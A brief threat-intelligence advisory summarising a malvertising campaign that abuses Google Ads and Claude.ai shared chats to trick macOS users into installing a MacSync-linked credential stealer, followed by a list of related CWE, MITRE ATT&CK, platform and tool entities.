Malvertising Campaign Targets macOS Users via Google Ads and Claude.ai Chats

Severity: High (Score: 67.5)

Sources: www.virustotal.com, Bleepingcomputer, Gbhackers, Letsdatascience

Summary

A malvertising campaign has been identified that exploits Google Ads and Claude.ai shared chats to deliver malware to macOS users. Security researcher Berk Albayrak reported on May 10, 2026, that attackers are using Google Ads to direct users searching for 'Claude mac download' to malicious instructions disguised as an official installation guide. These instructions prompt users to execute Terminal commands that download and run a compressed in-memory loader script. The malware variant identified is linked to MacSync and is capable of harvesting sensitive information such as browser credentials and macOS Keychain contents. The campaign employs social engineering tactics to increase its credibility by using legitimate platforms. Multiple domains have been used to host the malicious payloads, which evade detection through obfuscation and behavioral checks. The campaign's impact is currently under investigation, with reports confirming its active status. Key Points: • Attackers exploit Google Ads and Claude.ai chats to deliver macOS malware. • Malware installation is disguised as an official 'Claude Code on Mac' guide. • The campaign uses obfuscation techniques to evade detection and target specific users.

Key Entities

• Malware (attack_type)
• CWE-200 - Exposure of Sensitive Information (cwe)
• Cwe-601 - Open Redirect (cwe)
• claude.ai (domain)
• MacSync (malware)
• T1003 - OS Credential Dumping (mitre_attack)
• T1027 - Obfuscated Files Or Information (mitre_attack)
• T1041 - Exfiltration Over C2 Channel (mitre_attack)
• T1059.004 - Unix Shell (mitre_attack)
• T1059.005 - Visual Basic (mitre_attack)
• Anthropic Claude (platform)
• Google Ads (platform)
• MacOS (platform)
• Gunzip (tool)
• Osascript (tool)
• Terminal (tool)